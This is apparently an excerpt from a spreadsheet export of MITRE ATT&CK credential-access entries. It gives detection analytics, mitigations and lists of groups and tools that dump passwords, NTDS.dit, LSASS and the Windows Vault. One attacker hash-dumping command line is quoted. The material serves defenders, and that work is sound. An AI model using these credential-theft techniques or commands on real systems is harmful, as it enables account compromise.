[LaZagne](https://attack.mitre.org/software/S0349) can use the `&lt;PID&gt;/maps` and `&lt;PID&gt;/mem` files to identify regex patterns to dump cleartext passwords from the browser's process memory.(Citation: GitHub LaZagne Dec 2018)(Citation: Picus Labs Proc cump 2022)
MimiPenguin
[MimiPenguin](https://attack.mitre.org/software/S0179) can use the `&lt;PID&gt;/maps` and `&lt;PID&gt;/mem` file to search for regex patterns and dump the process memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Picus Labs Proc cump 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Enumeration
Monitor for API calls and CLI commands that attempt to enumerate and fetch credential material from the secrets manager, such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure. Alert on any suspicious usages of these commands, such as an account or service generating an unusually high number of secret requests.
Privileged Account Management
Limit the number of cloud accounts and services with permission to query the secrets manager to only those required. Ensure that accounts and services with permissions to query the secrets manager only have access to the secrets they require.
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can retrieve secrets from the AWS Secrets Manager via the enum_secrets module.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Access
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Monitor for replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
Command Execution
Monitor executed commands and arguments that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Look for command-lines that invoke AuditD or the Security Accounts Manager (SAM). Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
File Access
Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised ( LinkById: T1078) in-use by adversaries may help as well.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OS API Execution
Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
Process Access
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
##### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/maps&lt;/code&gt;, where the &lt;code&gt;&amp;lt;pid&amp;gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
Process Creation
Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Windows Registry Key Access
Monitor for the SAM registry key being accessed that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
Active Directory Configuration
Manage the access control list for “Replicating Directory Changes” and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL) Consider adding users to the "Protected Users" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to secure LSASS and prevent credential stealing. (Citation: win10_asr)
Credential Access Protection
With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)
Encrypt Sensitive Information
Ensure Domain Controller backups are properly secured.
Operating System Configuration
Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Windows:
Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.(Citation: Microsoft Securing Privileged Access)
Linux:
Scraping the passwords from memory requires root privileges. Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing such sensitive regions of memory.
Privileged Process Integrity
On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.(Citation: Microsoft LSA)
User Training
Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.
APT28
[APT28](https://attack.mitre.org/groups/G0007) regularly deploys both publicly available (ex: [Mimikatz](https://attack.mitre.org/software/S0002)) and custom password retrieval tools on victims.(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)(Citation: US District Court Indictment GRU Oct 2018)	
APT32
[APT32](https://attack.mitre.org/groups/G0050) used GetPassword_x64 to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used different versions of Mimikatz to obtain credentials.(Citation: BitDefender Chafer May 2020)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has been known to dump credentials.(Citation: Novetta-Axiom)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used publicly available tools to dump password hashes, including [HOMEFRY](https://attack.mitre.org/software/S0232).(Citation: FireEye APT40 March 2019)
Poseidon Group
[Poseidon Group](https://attack.mitre.org/groups/G0033) conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.(Citation: Kaspersky Poseidon Group)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) has used credential dumping tools.(Citation: Symantec Sowbug Nov 2017)
Suckfly
[Suckfly](https://attack.mitre.org/groups/G0039) used a signed credential-dumping tool to obtain victim account credentials.(Citation: Symantec Suckfly May 2016)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used a variety of credential dumping tools.(Citation: TrendMicro Tonto Team October 2020) 
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) obtains Windows logon password details.(Citation: FireEye CARBANAK June 2017)
HOMEFRY
[HOMEFRY](https://attack.mitre.org/software/S0232) can perform credential dumping.(Citation: FireEye Periscope March 2018)
OnionDuke
[OnionDuke](https://attack.mitre.org/software/S0052) steals credentials from its victims.(Citation: F-Secure The Dukes)
PinchDuke
[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).(Citation: F-Secure The Dukes)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for credential harvesting.(Citation: Cylance Shaheen Nov 2018)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can dump passwords and save them into &lt;code&gt;\ProgramData\Mail\MailAg\pwds.txt&lt;/code&gt;.(Citation: Symantec Dragonfly)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Access
Monitor for unexpected files used to gather credentials when the files are rendered
File Creation
Monitor for newly constructed .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources 
File Modification
Monitor for changes made to the .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources 
Network Traffic Content
For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Network Traffic Flow
Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems.If attempts are detected, then investigate endpoint data sources to find the root cause.
&lt;h4&gt;Analytic 1 - SMB Session Setups&lt;/h4&gt;
&lt;code&gt;smb_setup = filter flow where (dest_port == 445 and protocol == smb.setup)
smb_setup.user = smb_write.proto_info.user_name
smb_setup.target_host = smb_write.proto_info.hostname&lt;/code&gt;
Filter Network Traffic
Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with allowlisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)
Password Policies
Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.
DarkHydrus
[DarkHydrus](https://attack.mitre.org/groups/G0079) used [Template Injection](https://attack.mitre.org/techniques/T1221) to launch an authentication window for users to enter their credentials.(Citation: Unit 42 Phishery Aug 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.(Citation: MSTIC Nobelium Toolset May 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts and/or using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML). Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the credentials.(Citation: Microsoft SolarWinds Customer Guidance)
Web Credential Creation
Monitor for creation of access tokens using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML) Additionally, detect on unusual API calls to generate access tokens, such as `sts:GetFederationToken` in AWS.(Citation: Crowdstrike AWS User Federation Persistence)
Web Credential Usage
Monitor for the use of Access Tokens to access services such as Email that were created using SAML tokens which do not have corresponding 1202 events in the domain.(Citation: Sygnia Golden SAML)
Audit
Administrators should perform an audit of all access lists and the permissions they have been granted to access web applications and services. This should be done extensively on all resources in order to establish a baseline, followed up on with periodic audits of new or updated resources. Suspicious accounts/credentials should be investigated and removed.
Enable advanced auditing on ADFS. Check the success and failure audit options in the ADFS Management snap-in. Enable Audit Application Generated events on the AD FS farm via Group Policy Object.(Citation: FireEye ADFS)
Privileged Account Management
Restrict permissions and access to the AD FS server to only originate from privileged access workstations.(Citation: FireEye ADFS)
Software Configuration
Configure browsers/applications to regularly delete persistent web credentials (such as cookies).
User Account Management
Ensure that user accounts with administrative rights follow best practices, including use of privileged access workstations, Just in Time/Just Enough Administration (JIT/JEA), and strong authentication. Reduce the number of users that are members of highly privileged Directory Roles.(Citation: Microsoft SolarWinds Customer Guidance) In AWS environments, prohibit users from calling the `sts:GetFederationToken` API unless explicitly required.(Citation: Crowdstrike AWS User Federation Persistence)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for logins using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML) These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance)
Logon Session Metadata
Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)
User Account Authentication
Monitor for user authentication attempts, when requesting access tokens to services, that failed because of Conditional Access Policies (CAP). Some SAML tokens features, such as the location of a user, may not be as easy to claim.
Web Credential Creation
Monitor for creation of access tokens using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML)
Web Credential Usage
Monitor for the use of access tokens to access services such as email that were created using SAML tokens which do not have corresponding 1202 events (i.e. “The Federation Service validated a new credential”) in the domain.(Citation: Sygnia Golden SAML)
Active Directory Configuration
For containing the impact of a previously forged SAML token, rotate the token-signing AD FS certificate in rapid succession twice, which will invalidate any tokens generated using the previous certificate.(Citation: Mandiant Defend UNC2452 White Paper)
Audit
Enable advanced auditing on AD FS. Check the success and failure audit options in the AD FS Management snap-in. Enable Audit Application Generated events on the AD FS farm via Group Policy Object.(Citation: FireEye ADFS)
Privileged Account Management
Restrict permissions and access to the AD FS server to only originate from privileged access workstations.(Citation: FireEye ADFS)
User Account Management
Ensure that user accounts with administrative rights follow best practices, including use of privileged access workstations, Just in Time/Just Enough Administration (JIT/JEA), and strong authentication. Reduce the number of users that are members of highly privileged Directory Roles.(Citation: Microsoft SolarWinds Customer Guidance)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) created tokens using compromised SAML signing certificates.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Secureworks IRON RITUAL Profile)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can be used to create SAML tokens using the AD Federated Services token signing certificate.(Citation: AADInternals Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.
Web Credential Usage
Monitor for the usage of unexpected or unusual cookies to access resources and services. Forged web cookies may be associated with unknown accounts and could be the result of compromised secrets such as passwords or [Private Keys](https://attack.mitre.org/techniques/T1552/004).
Audit
Administrators should perform an audit of all access lists and the permissions they have been granted to access web applications and services. This should be done extensively on all resources in order to establish a baseline, followed up on with periodic audits of new or updated resources. Suspicious accounts/credentials should be investigated and removed.
Software Configuration
Configure browsers/applications to regularly delete persistent web cookies.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.(Citation: Volexity SolarWinds)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for suspicious activity listing credentials from the Windows Credentials locker (e.g. &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)
File Access
Consider monitoring file reads to Vault locations, &lt;code&gt;&amp;percnt;Systemdrive&amp;percnt;&amp;bsol;Users&amp;bsol;&amp;bsol;&amp;lsqb;Username&amp;rsqb;&amp;bsol;AppData&amp;bsol;Local&amp;bsol;Microsoft&amp;bsol;&amp;bsol;&amp;lsqb;Vault&amp;sol;Credentials&amp;rsqb;&amp;bsol;&lt;/code&gt;, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
OS API Execution
Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Process Creation
Monitor newly executed processes for suspicious activity listing credentials from the Windows Credentials locker (e.g. &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)
Disable or Remove Feature or Program
Consider enabling the “Network access: Do not allow storage of passwords and credentials for network authentication” setting that will prevent network credentials from being stored by the Credential Manager.(Citation: Microsoft Network access Credential Manager)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.(Citation: FireEye APT34 July 2019)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from the Windows Credential Vault.(Citation: Citizen Lab Stealth Falcon May 2016)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has gathered credentials from the Windows Credential Manager tool.(Citation: Symantec Waterbug Jun 2019)	
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used PowerShell cmdlet `Invoke-WCMDump` to enumerate Windows credentials in the Credential Manager in a compromised network.(Citation: Mandiant FIN12 Oct 2021)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from the Windows Credential Manager.(Citation: Cybereason Kimsuky November 2020)
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from Vault files.(Citation: GitHub LaZagne Dec 2018)	
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has a plugin that can retrieve credentials from Internet Explorer and Microsoft Edge using `vaultcmd.exe` and another that can collect RDP access credentials using the `CredEnumerateW` function.(Citation: BiZone Lizar May 2021)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002) contains functionality to acquire credentials from the Windows Credential Manager.(Citation: Delpy Mimikatz Crendential Manager)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can steal credentials by leveraging the Windows Vault mechanism.(Citation: Talos Group123)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.(Citation: Bitdefender Naikon April 2021)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can gather Windows Vault credentials.(Citation: GitHub SILENTTRINITY Modules July 2019) 
Valak
[Valak](https://attack.mitre.org/software/S0476) can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.(Citation: SentinelOne Valak June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor application logs for suspicious events including repeated MFA failures that may indicate user's primary credentials have been compromised.
Logon Session Creation
Monitor 2FA/MFA application logs for suspicious events such as rapid login attempts with valid credentials.
Logon Session Metadata
Monitor 2FA/MFA application logs for suspicious events such as unusual login attempt source location, mismatch in location of login attempt and smart device approving 2FA/MFA request prompts.
User Account Authentication
Monitor user account logs for suspicious events: unusual login attempt source location, mismatch in location of login attempt and smart device receiving 2FA/MFA request prompts, and high volume of repeated login attempts, all of which may indicate user's primary credentials have been compromised minus 2FA/MFA mechanism.
Account Use Policies
Enable account restrictions to prevent login attempts, and the subsequent 2FA/MFA service requests, from being initiated from suspicious locations or when the source of the login attempts do not match the location of the 2FA/MFA smart device. Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)
Multi-factor Authentication
Implement more secure 2FA/MFA mechanisms in replacement of simple push or one-click 2FA/MFA options. For example, having users enter a one-time code provided by the login screen into the 2FA/MFA application or utilizing other out-of-band 2FA/MFA mechanisms (such as rotating code-based hardware tokens providing rotating codes that need an accompanying user pin) may be more secure. Furthermore, change default configurations and implement limits upon the maximum number of 2FA/MFA request prompts that can be sent to users in period of time.(Citation: MFA Fatigue Attacks - PortSwigger)
User Training
Train users to only accept 2FA/MFA requests from login attempts they initiated, to review source location of the login attempt prompting the 2FA/MFA requests, and to report suspicious/unsolicited prompts.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) attempted to gain access by continuously sending MFA messages to the victim until they accept the MFA push challenge.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used repeated MFA requests to gain access to victim accounts.(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.(Citation: MSTIC DEV-0537 Mar 2022)
Scattered Spider
[Scattered Spider](https://attack.mitre.org/groups/G1015) has used multifactor authentication (MFA) fatigue by sending repeated MFA authentication requests to targets.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. Look for command-lines that invoke attempts to access or copy the NTDS.dit.
Note: Events 4688 (Microsoft Windows Security Auditing) and 1 (Microsoft Windows Sysmon) provide context of commands and parameters being executed via creation of a new process. Event 800 (PowerShell) provides context of commands and parameters being executed via PowerShell. This detection is based on known Windows utilities commands and parameters that can be used to copy the ntds.dit file. It is recommended to keep the list of commands and parameters up to date.
&lt;h4&gt; Analytic 1 - Command line attempt to access or create a copy of ntds.dit file&lt;/h4&gt;
&lt;code&gt;suspicious_command = filter command_execution where (
(event_id = "4688" OR event_id = "1" OR event_id = "800") AND 
((command_line = "*ntds*" AND command_line = "*ntdsutil*" AND command_line = "*create*") OR
 (command_line = "**vssadmin" AND command_line = "*create*" AMD command_line = "*shadow*") OR (command_line = "*copy*" AND command_line = "*ntds.dit*")) &lt;/code&gt;
File Access
Monitor for access or copy of the NTDS.dit.
Note: Events 4656 and 4663 (Microsoft Windows Security Auditing) provide context of processes and users requesting access or accessing file objects (ObjectType = File) such as C:\Windows\NTDS\ntds.dit. It is important to note that, in order to generate these events, a System Access Control List (SACL) must be defined for the ntds.dit file. Access rights that allow read operations on file objects and its attributes are %%4416 Read file data, %%4419 Read extended file attributes, %%4423 Read file attributes. If you search for just the name of the file and not the entire directory, you may get access events related to the ntds.dit file within a snapshot or volume shadow copy. 
Events 4656 and 4663 (Microsoft Windows Security Auditing) provide context of processes and users creating or copying file objects (ObjectType = File) such as C:\Windows\NTDS\ntds.dit. It is important to note that, in order to generate these events, a System Access Control List (SACL) must be defined for the ntds.dit file. In order to filter file creation events, filter access rigths %%4417 Write data to the file and %%4424 Write file attributes.
Event 11 (Microsoft Windows Sysmon) provide context of processes and users creating or copying files. Unfortunately, this event provides context of the file being created or copied, but not the file being copied. A good starting point would be to look for new files created or copied with extension .dit.
&lt;h4&gt; Analytic 1 &lt;/h4&gt;
&lt;code&gt;suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND 
(object_type = "File") AND
(file_name = "*ntds.dit*") AND
(access_list = "*%%4416*" OR access_list = "*%%4419*" OR access_list = "*%%4416*")&lt;/code&gt;
&lt;h4&gt; Analytic 2 &lt;/h4&gt;
&lt;code&gt;suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND 
(object_type = "File") AND
(file_name = "*ntds.dit*") AND
(access_list = "*%%4417*" OR access_list = "*%%4424*")&lt;/code&gt;
&lt;h4&gt; Analytic 3&lt;/h4&gt;
&lt;code&gt;suspicious_file = filter file_access where ((event_id = "11") AND (file_name = "*.dit") &lt;/code&gt;
Encrypt Sensitive Information
Ensure Domain Controller backups are properly secured.(Citation: Metcalf 2015)
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.
User Training
Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used the ntdsutil.exe utility to export the Active Directory database for credential access.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has gathered the SYSTEM registry and ntds.dit files from target systems.(Citation: Cycraft Chimera April 2020) [Chimera](https://attack.mitre.org/groups/G0114) specifically has used the NtdsAudit tool to dump the password hashes of domain users via &lt;code&gt;msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv&lt;/code&gt; and used ntdsutil to copy the Active Directory database.(Citation: NCC Group Chimera January 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has harvested the NTDS.DIT file and leveraged the [Impacket](https://attack.mitre.org/software/S0357) tool on the compromised domain controller to locally decrypt it.(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit’s [PsExec](https://attack.mitre.org/software/S0029) NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)	
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Volume Shadow Copy to access credential information from NTDS.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has stolen copies of the Active Directory database (NTDS.DIT).(Citation: Volexity Exchange Marauder March 2021)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used NTDSDump and other password dumping tools to gather credentials.(Citation: Microsoft NICKEL December 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database.(Citation: MSTIC DEV-0537 Mar 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. [Mustang Panda](https://attack.mitre.org/groups/G0129) has also used &lt;code&gt;reg save&lt;/code&gt; on the SYSTEM file Registry location to help extract the NTDS.dit file.(Citation: Secureworks BRONZE PRESIDENT December 2019)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used `ntdsutil.exe` to back up the Active Directory database, likely for credential access.(Citation: Microsoft Prestige ransomware October 2022)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used ntds.util to create domain controller installation media containing usernames and password hashes.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has gained access to credentials via exported copies of the ntds.dit Active Directory database. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also created a volume shadow copy and used a batch script file to collect NTDS.dit with the use of the Windows utility, ntdsutil.(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used Ntdsutil to dump credentials.(Citation: Symantec Cicada November 2020)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.(Citation: CME Github September 2018)
Impacket
SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information from NTDS.dit.(Citation: Impacket Tools)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by gathering domain controller hashes from NTDS.(Citation: Github Koadic)
esentutl
[esentutl](https://attack.mitre.org/software/S0404) can copy `ntds.dit` using the Volume Shadow Copy service.(Citation: LOLBAS Esentutl)(Citation: Cary Esentutl)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain.
Process Access
Monitor for processes being accessed that may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain.
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) uses the keychaindump project to read securityd memory.(Citation: synack 2016 review)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
Monitor AD CS certificate requests (ex: EID 4886) as well as issued certificates (ex: EID 4887) for abnormal activity, including unexpected certificate enrollments and signs of abuse within certificate attributes (such as abusable EKUs).(Citation: SpecterOps Certified Pre Owned)
Active Directory Object Modification
Monitor for changes to CA attributes and settings, such as AD CS certificate template modifications (ex: EID 4899/4900 once a potentially malicious certificate is enrolled).(Citation: SpecterOps Certified Pre Owned)
Application Log Content
Ensure CA audit logs are enabled and monitor these services for signs of abuse.(Citation: SpecterOps Certified Pre Owned)
Command Execution
Monitor for the execution of commands and other utilities abused to forge and/or steal certificates and related private keys.(Citation: SpecterOps Certified Pre Owned)
File Access
Monitor for attempts to access files that store information about certificates and their associated private keys. For example, personal certificates for users may be stored on disk in folders such as `%APPDATA%\Microsoft\SystemCertificates\My\Certificates\`.(Citation: SpecterOps Certified Pre Owned)(Citation: O365 Blog Azure AD Device IDs)
Logon Session Creation
Monitor certificate-based authentication events, such as EID 4768 when an AD CS certificate is used for Kerberos authentication (especially those that don’t correspond to legitimately issued certificates) or when Secure Channel (`Schannel`, associated with SSL/TLS) is highlighted as the `Logon Process` associated with an EID 4624 logon event.(Citation: SpecterOps Certified Pre Owned)
Windows Registry Key Access
Monitor for attempts to access information stored in the Registry about certificates and their associated private keys. For example, user certificates are commonly stored under `HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates`.(Citation: SpecterOps Certified Pre Owned)(Citation: O365 Blog Azure AD Device IDs)
Active Directory Configuration
